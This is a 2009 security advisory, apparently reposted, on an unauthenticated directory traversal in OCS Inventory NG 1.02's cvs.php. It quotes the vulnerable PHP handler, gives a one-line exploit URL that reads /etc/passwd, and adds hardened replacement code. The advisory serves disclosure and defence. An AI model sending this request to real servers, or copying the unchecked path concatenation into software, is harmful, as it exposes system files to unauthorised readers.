OCS Inventory NG 1.02 - Directory Traversal

2009-06-03 / 2009-06-04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

OCS Inventory NG - Directory Traversal (May 30 2009)

* Product
Open Computer and Software (OCS) Inventory NG (http://www.ocsinventory-ng.org)

* Vulnerable Versions
OCS Inventory NG 1.02 (Unix)

* Vendor Status
Vendor has been notified and the vulnerability has been fixed in version 1.02.1.

* Details
The Open Computer and Software (OCS) Inventory Next Generation (NG) provides relevant inventory information about system configurations and software on the network. The server can be managed using a web interface.

It is possible for unauthenticated users to extract arbitrary files from the hosting system due to inadequate file handling in cvs.php. The handler concatenates the user-supplied `rep` and `log` parameters into a path and reads whatever file exists there, without restricting it to a log directory.

cvs.php:

    } elseif (isset($_GET['log'])){
        if (file_exists($_GET['rep'].$_GET['log'])){
            $tab = file($_GET['rep'].$_GET['log']);
            while(list($cle,$val) = each($tab)) {
                $toBeWritten .= $val."\r\n";
            }
            $filename=$_GET['log'];
        }
    }

* Impact
Attackers may be able to read arbitrary files from the hosting system.

* Exploit
The vulnerability can be exploited by just using a web browser:

http://example.org/ocsreports/cvs.php?log=/etc/passwd

http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_directory_traversal.shtml

Nico Leidecker - http://www.leidecker.info
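As an added illustration of how a handler like the one quoted above can be hardened (this is example code written for this page, not the vendor's 1.02.1 fix): the log directory is fixed server-side, the client supplies only a bare filename, and the resolved path is verified to lie inside that directory. The `$logDir` location, the `readLogSafely()` helper and the `.log` name pattern are assumptions.

```php
<?php
// Hardened replacement for the cvs.php log handler (added example, not the vendor's fix).
// Assumption: log files live in a single fixed directory; $_GET['rep'] is no longer honoured.
$logDir = realpath(__DIR__ . '/logs'); // hypothetical log directory
if ($logDir === false) {
    http_response_code(500);
    exit('Log directory unavailable');
}

function readLogSafely(string $logDir, string $requested): ?string
{
    // Accept only a plain filename: no path separators, no ".", "..", or NUL bytes.
    if ($requested === '' || $requested !== basename($requested)
        || strpos($requested, "\0") !== false || $requested === '.' || $requested === '..') {
        return null;
    }
    // Allow-list the name shape (assumed convention: something.log); tighten as needed.
    if (!preg_match('/^[A-Za-z0-9_.-]+\.log$/', $requested)) {
        return null;
    }
    // Resolve symlinks and confirm the canonical path is still inside $logDir.
    $path = realpath($logDir . DIRECTORY_SEPARATOR . $requested);
    $prefix = $logDir . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    $lines = file($path, FILE_IGNORE_NEW_LINES);
    if ($lines === false) {
        return null;
    }
    // Same CRLF-joined output the original handler built, minus the deprecated each() loop.
    return implode("\r\n", $lines) . "\r\n";
}

if (isset($_GET['log'])) {
    $toBeWritten = readLogSafely($logDir, (string) $_GET['log']);
    if ($toBeWritten === null) {
        // Do not echo the requested name back: it keeps probing responses uniform.
        http_response_code(404);
        exit('Log not found');
    }
    $filename = basename((string) $_GET['log']);
    header('Content-Type: text/plain');
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    echo $toBeWritten;
}
```

The check that matters is the `realpath()` prefix comparison: `file_exists()` alone, as in the original, says nothing about where the file lives.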

References:

http://www.leidecker.info/advisories/2009-05-30-ocs_inventory_ng_directory_traversal.shtml



Copyright 2024, cxsecurity.com
